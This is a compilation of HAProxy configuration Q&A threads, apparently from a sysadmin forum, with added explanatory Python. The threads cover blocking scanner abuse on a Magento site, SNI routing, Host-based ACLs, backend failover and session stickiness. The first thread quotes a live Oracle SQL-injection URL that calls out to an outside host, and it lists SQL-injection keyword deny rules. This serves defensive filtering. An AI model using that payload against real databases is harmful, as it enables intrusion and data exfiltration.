Advanced abuse detection - haproxy

We are facing some Netsparker scans and other abuse-related things on a Magento2 installation. We already implemented rate limiting with stick tables.
In the next step we want to deny specific URLs with an ACL.
An example
https://www.exampledomain.com/category/page.html?hTTp%3A%2F%2Fr87_com%2Fn=&attribute=(select%20UTL_INADDR.GET_HOST_ADDRESS(%27i-bwzqt8sjg7sqtf9ygenxljxxmu2ad0itrghi_9%27%7c%7c%27k34.r87.me%27)%20from%20DUAL)
We tried to set up some regexes like
frontend https
bind *:443 ssl crt...
#SQL injection prevention
#acl URI_DENY url_reg -i .*(WAITFOR|WHERE|DELAY|DECLARE|SLEEP|NSFTW|DUAL)
#acl URI_DENY url_reg -i .*(SELECT)
#acl URI_DENY url_reg -i .*(convert|exec|bexec|procedure|dblink|r87.com|xp_dirtree|pg_sleep|dbms_pipe)
#acl URI_DENY url_reg -i .*(CTXSYS.DRITHSX.SN|GET_HOST_ADDRESS)
#http-request tarpit if URI_DENY
which results in application frontend errors.
How can we handle this more efficiently?
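An added illustration (not from the question) of why substring ACLs like the ones above hit ordinary shop URLs, next to a decoded, word-bounded variant. The TIGHT pattern list and the two benign URLs are assumptions constructed for the demo; in HAProxy the decoding step corresponds to the url_dec converter in front of a -m reg match.

```python
import re
from urllib.parse import unquote

# The question's substring ACLs, copied as written (the '.' in r87.com is an unescaped
# any-character): any occurrence matches, even inside an ordinary word.
NAIVE = re.compile(
    r"(WAITFOR|WHERE|DELAY|DECLARE|SLEEP|NSFTW|DUAL|SELECT|convert|exec|procedure|"
    r"dblink|r87.com|xp_dirtree|pg_sleep|dbms_pipe|GET_HOST_ADDRESS)", re.I)

# Assumed tighter list: decode first, then require word boundaries and SQL-shaped context.
# Tune against real access logs before enforcing.
TIGHT = re.compile(
    r"\bselect\b.+?\bfrom\b|\bunion\b.+?\bselect\b|\bwaitfor\s+delay\b|\bpg_sleep\s*\(|"
    r"\bdbms_pipe\.|\butl_inaddr\.|\bxp_dirtree\b|\bget_host_address\b|\bdblink\s*\(",
    re.I | re.S)

def decode_url(url, rounds=3):
    """Percent-decode repeatedly (bounded) so %2553 style double encoding cannot hide a keyword."""
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def naive_hit(url):
    return NAIVE.search(url) is not None

def tight_hit(url):
    return TIGHT.search(decode_url(url)) is not None

# Constructed samples: the injection attempt quoted in the question plus two ordinary
# Magento-style catalogue URLs that the substring ACLs would tarpit as well.
SAMPLES = {
    "injection": "/category/page.html?hTTp%3A%2F%2Fr87_com%2Fn=&attribute=(select%20UTL_INADDR"
                 ".GET_HOST_ADDRESS(%27i-bwzqt8sjg7sqtf9ygenxljxxmu2ad0itrghi_9%27%7c%7c%27k34.r87.me%27)%20from%20DUAL)",
    "benign_catalog": "/individual-sleepwear.html?product_list_order=position",
    "benign_search": "/catalogsearch/result/?q=executive+converter+for+everywhere",
}

def classify(samples=SAMPLES):
    """Map each sample name to (substring_hit, decoded_bounded_hit)."""
    return {name: (naive_hit(u), tight_hit(u)) for name, u in samples.items()}

if __name__ == "__main__":
    for name, (naive, tight) in classify().items():
        print(f"{name:15} substring={naive!s:5} decoded+bounded={tight}")
```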

Related

Is it possible to redirect a TCP connection based on host name?

What I want to be able to do is connect to a postgres server like this:
psql -h postgres-a.example.com -p 9000
That connection should be received by a proxy server (like nginx or haproxy) and it will be redirected to database A because of host name postgres-a.example.com. If I use postgres-b.example.com and the same port, it should go to database B.
I have been researching this, but I am still not 100% sure of how this would work. I read that the only way to redirect a TCP connection (psql) based on host name is using the SNI header. But I still don't understand if we will need an SSL certificate for this, or if we will need to use https://postgres-a.example.com (that doesn't make any sense to me). How will it work?
Can someone help me understand this?
Yes. You will need a certificate for TLS/SSL and you can route the requests based on req.ssl_sni to the proper backend.
I'm not sure if psql uses SNI, but I think you have to check this.
frontend public_ssl
mode tcp
# no ssl/crt on the bind: req.ssl_sni reads the raw ClientHello, so TLS is passed through
# unchanged and the certificates live on the PostgreSQL servers themselves
bind :::9000 v4v6
option tcplog
tcp-request inspect-delay 5s
tcp-request content accept if { req.ssl_hello_type 1 }
# use_backend (use-server is only valid inside a backend section)
use_backend postgres-a if { req.ssl_sni -i postgres-a.example.com }
use_backend postgres-b if { req.ssl_sni -i postgres-b.example.com }
backend postgres-a
mode tcp
server postgres-a FURTHER SERVER PARAMS
backend postgres-b
mode tcp
server postgres-b FURTHER SERVER PARAMS
I have created a blog post with a picture for a more detailed description.
https://www.me2digital.com/blog/2019/05/haproxy-sni-routing/

HAProxy: How to match on hostname instead of the IP address

I am trying to match the host request header and use appropriate backend to route the request.
This is what I want to match on (which does not work):
acl from_external_url req.hdr(Host) -i mydomain.com
# Chrome dev tools network tab does show mydomain.com set as the Host header
However, matching to a direct IP address works (which I don't want):
acl from_external_url req.hdr(Host) -i 22.22.22.22
So, how do I make HAProxy route on hostname instead of the IP?
Update 1:
use_backend oid_external if from_external_url
use_backend oid_internal if !from_external_url
I use the below way to route based on hostname, which works, as I have about 12 sites going through haproxy.
acl host_mydomain.com hdr(host) -i mydomain.com
use_backend oid_external if host_mydomain.com

HAProxy - use_backend if it's available

Is there a way to utilize use_backend with an ACL match, but, in the case the backend is unavailable (down, maint, etc.), then use the default?
For example:
# Define hosts
acl host_bacon hdr(host) -i ilovebacon.com
acl host_milkshakes hdr(host) -i bobsmilkshakes.com
## figure out which one to use
use_backend bacon_cluster if host_bacon
use_backend milshake_cluster if host_milkshakes
default_backend web-app-cluster
In the case above, if the bacon and milkshake backends have no available servers, can it fall back and use web-app-cluster?
Thanks
Yes, it is possible, for example, you could use something like this:
acl host_bacon hdr(host) -i ilovebacon.com
acl host_milkshakes hdr(host) -i bobsmilkshakes.com
# check if bacon & milk ok
acl bacon_cluster_down nbsrv(bacon_cluster) lt 1
acl milks_cluster_down nbsrv(milshake_cluster) lt 1
# use default web-app if bacon & milk down
use_backend web-app-cluster if bacon_cluster_down
use_backend web-app-cluster if milks_cluster_down
use_backend bacon_cluster if host_bacon
use_backend milshake_cluster if host_milkshakes
default_backend web-app-cluster
...
Notice the use of nbsrv([<backend>]) : integer
From the docs:
Returns an integer value corresponding to the number of usable servers of
either the current backend or the named backend. This is mostly used with
ACLs but can also be useful when added to logs. This is normally used to
switch to an alternate backend when the number of servers is too low
to handle some load. It is useful to report a failure when combined with
"monitor fail".
Check for more examples in this HAproxy post: failover and worst case management with HAProxy

Transmission Torrent behind HAProxy - HTTP Response Header used as session identifier and stickiness token

I've been trying, and failing so far, to run Transmission behind HAProxy.
If I just add a new backend and route traffic as follows:
frontend http-in
bind *:80
reqadd X-Forwarded-Proto:\ http
acl host1 hdr_end(host) -i web.host1.host
use_backend apache_backend if host1
acl transmission_host hdr_end(host) -i transmission.host1.host
use_backend transmission_backend if transmission_host
Then I get a 409 conflict error stating I have an invalid session-id header. That's pretty obvious and expected since there's a proxy in the middle.
I thought of recompiling transmission to get rid of the check, but decided in the end to face the challenge of learning a bit more of HAProxy. What did I have in mind?
Client reaches HAProxy
HAProxy connects to transmission-daemon
Daemon replies with X-Transmission-Session-Id
HAProxy stores the Session-Id somehow and replaces Session-Id sent by the client with the one captured by HAProxy.
After a lot of Googling and playing with the settings, I got an almost working configuration:
frontend http-in
bind *:80
reqadd X-Forwarded-Proto:\ http
capture response header X-Transmission-Session-Id len 48
acl host1 hdr_end(host) -i web.host1.host
use_backend apache_backend if host1
acl transmission_host hdr_end(host) -i transmission.host1.host
use_backend transmission_backend if transmission_host
backend transmission_backend
mode http
http-request set-header X-Transmission-Session-Id %hs
server transmission-daemon transmission.intranet:9091
My configuration examples are summarized.
It works, sort of. I get a login prompt for transmission, but the page loads incredibly slow. I'm more than 10 minutes in and still don't have it fully loaded.
More pages go through this proxy: HTTP, HTTPS, TCP, some load balanced, some set as fail-overs. They all load normally and fast. If I connect directly to the transmission-daemon server, it loads fast as well.
I'll keep looking around.
Any ideas?
Thanks in advance!
3 years later,
from what I've seen in https://gist.github.com/yuezhu/93184b8d8d9f7d0ada0a186cbcda9273
you should capture request and response in frontend http-in,
I didn't dig much more, but the backend seems to need
stick-table type binary len 48 size 30k expire 30m
# response side: hdr() is an alias for req.hdr, the response header fetch is res.hdr
stick store-response res.hdr(X-Transmission-Session-Id)
stick on hdr(X-Transmission-Session-Id)
to work
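An added model of the exchange listed in the question (client, daemon, 409, retry), written here as a constructed stand-in rather than Transmission's or HAProxy's own code. The point it makes: the daemon hands out the id in a 409 so that the requesting client learns it, which is the daemon's CSRF protection, so a proxy that stamps the current id onto every request answers that challenge for any caller.

```python
import secrets

class FakeTransmissionRpc:
    """Constructed stand-in for transmission-daemon's /transmission/rpc endpoint, not the real code.
    The daemon issues a random session id and answers any request lacking it with 409 plus the
    id to use. That round trip is its CSRF protection: the id is meant to be learned by the
    client that made the request, not supplied by a proxy on behalf of every caller."""

    def __init__(self):
        self.session_id = secrets.token_hex(24)      # 48 characters, like the real header
        self.accepted = 0

    def restart(self):
        self.session_id = secrets.token_hex(24)      # a daemon restart invalidates old ids

    def handle(self, headers):
        if headers.get("X-Transmission-Session-Id") != self.session_id:
            return 409, {"X-Transmission-Session-Id": self.session_id}, None
        self.accepted += 1
        return 200, {}, {"result": "success"}

class RpcClient:
    """Client side of the exchange: remember the id from a 409 and retry the request once."""
    HEADER = "X-Transmission-Session-Id"

    def __init__(self, send):
        self.send = send            # callable(headers) -> (status, headers, body)
        self.session_id = None
        self.retries = 0

    def call(self):
        headers = {self.HEADER: self.session_id} if self.session_id else {}
        status, resp_headers, body = self.send(headers)
        if status == 409 and self.HEADER in resp_headers:
            self.session_id = resp_headers[self.HEADER]   # learn the daemon's current id
            self.retries += 1
            status, resp_headers, body = self.send({self.HEADER: self.session_id})
        return status, body

def demo():
    """Fresh client: first call costs one 409 round trip, the second none, a restart one more."""
    daemon = FakeTransmissionRpc()
    client = RpcClient(daemon.handle)
    first, _ = client.call()
    second, _ = client.call()
    daemon.restart()
    third, _ = client.call()
    return (first, second, third), client.retries, daemon.accepted
```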

Can I use wildcard SNI matching with HAProxy?

I'm looking around trying to find an example of HAProxy matching SNI wildcards, and my searching is bringing up similarly titled, but unrelated questions about certificates.
Specifically I need to route nonce domains for dvsni with acme / letsencrypt.
frontend foo_ft_https
mode tcp
option tcplog
bind 0.0.0.0:443
acl foo_app_letsencrypt req.ssl_sni -i *.acme.invalid
use_backend foo_bk_letsencrypt if foo_app_letsencrypt
default_backend foo_bk_default
backend foo_bk_letsencrypt
mode tcp
option tcplog
server foo_srv_letsencrypt 127.0.0.1:3443
backend foo_bk_default
mode tcp
option tcplog
server foo_srv_default 127.0.0.1:8443
Note: all arbitrary names are prefixed with 'foo_' so that the reader can easily distinguish them from keywords, directives and such.
Change
acl foo_app_letsencrypt req.ssl_sni -i *.acme.invalid
to
acl foo_app_letsencrypt req.ssl_sni -m end .acme.invalid
It's not mentioned in the official documentation
https://cbonte.github.io/haproxy-dconv/configuration-1.5.html explicitly, but I was able to find other resources that led me to the correct result:
https://cbonte.github.io/haproxy-dconv/configuration-1.5.html#7.1.3
http://comments.gmane.org/gmane.comp.web.haproxy/14602
Note that if you were to try the first example, it would "work", but the "*" would be interpreted as a literal "*", not a wildcard.
Even though this is a very old question, I would like to share this solution, because it is still among the first Google results:
The solution given by CoolAJ86 doesn't work for me (it probably works for older versions of HAProxy). You can use ssl_fc_sni_end instead of ssl_fc_sni like this:
use_backend apache if { ssl_fc_sni_end domain.com }
It will do the work!
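An added example, not part of this answer or the PostgreSQL answer above, that shows what a tcp-mode req.ssl_sni match actually looks at. It builds a minimal ClientHello (constructed, fixed random and a single cipher suite), extracts the server_name the way the fetch does, and emulates the -m end suffix match. It also carries the first 8 bytes libpq sends: an SSLRequest message, after which TLS only starts once the server answers 'S', so an SNI-based use_backend never sees a ClientHello on a psql connection and falls through to the default.

```python
import struct

def build_client_hello(sni):
    """Constructed minimal TLS ClientHello record carrying only a server_name extension."""
    host = sni.encode("ascii")
    name = b"\x00" + struct.pack("!H", len(host)) + host             # host_name(0), length, name
    server_name_list = struct.pack("!H", len(name)) + name
    ext = struct.pack("!HH", 0, len(server_name_list)) + server_name_list  # extension type 0
    body = (b"\x03\x03" + b"\x11" * 32 + b"\x00"                       # version, fixed random, no session id
            + struct.pack("!H", 2) + b"\x00\x2f" + b"\x01\x00"        # one cipher suite, null compression
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body         # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

# The first 8 bytes libpq sends: an SSLRequest (length 8, code 80877103). The TLS handshake,
# and with it any SNI, only starts after the server answers 'S', so this is not a ClientHello.
PG_SSLREQUEST = struct.pack("!II", 8, 80877103)

def extract_sni(data):
    """Return the server_name from a ClientHello record, or None if data is not one (as req.ssl_sni would)."""
    try:
        if data[0] != 0x16 or data[5] != 0x01:
            return None
        pos = 43                                              # record(5)+handshake(4)+version(2)+random(32)
        pos += 1 + data[pos]                                  # skip session id
        pos += 2 + struct.unpack("!H", data[pos:pos + 2])[0]  # skip cipher suites
        pos += 1 + data[pos]                                  # skip compression methods
        ext_end = pos + 2 + struct.unpack("!H", data[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= ext_end:
            etype, elen = struct.unpack("!HH", data[pos:pos + 4])
            pos += 4
            if etype == 0:                                    # ServerNameList: len(2) type(1) len(2) name
                nlen = struct.unpack("!H", data[pos + 3:pos + 5])[0]
                return data[pos + 5:pos + 5 + nlen].decode("ascii")
            pos += elen
    except (IndexError, struct.error, UnicodeDecodeError):
        pass
    return None

def choose_backend(first_bytes, suffix_rules, default):
    """Emulate `use_backend B if { req.ssl_sni -m end SUFFIX }` for a list of (suffix, backend)."""
    sni = extract_sni(first_bytes)
    if sni is None:
        return default
    for suffix, backend in suffix_rules:
        if sni.lower().endswith(suffix.lower()):
            return backend
    return default
```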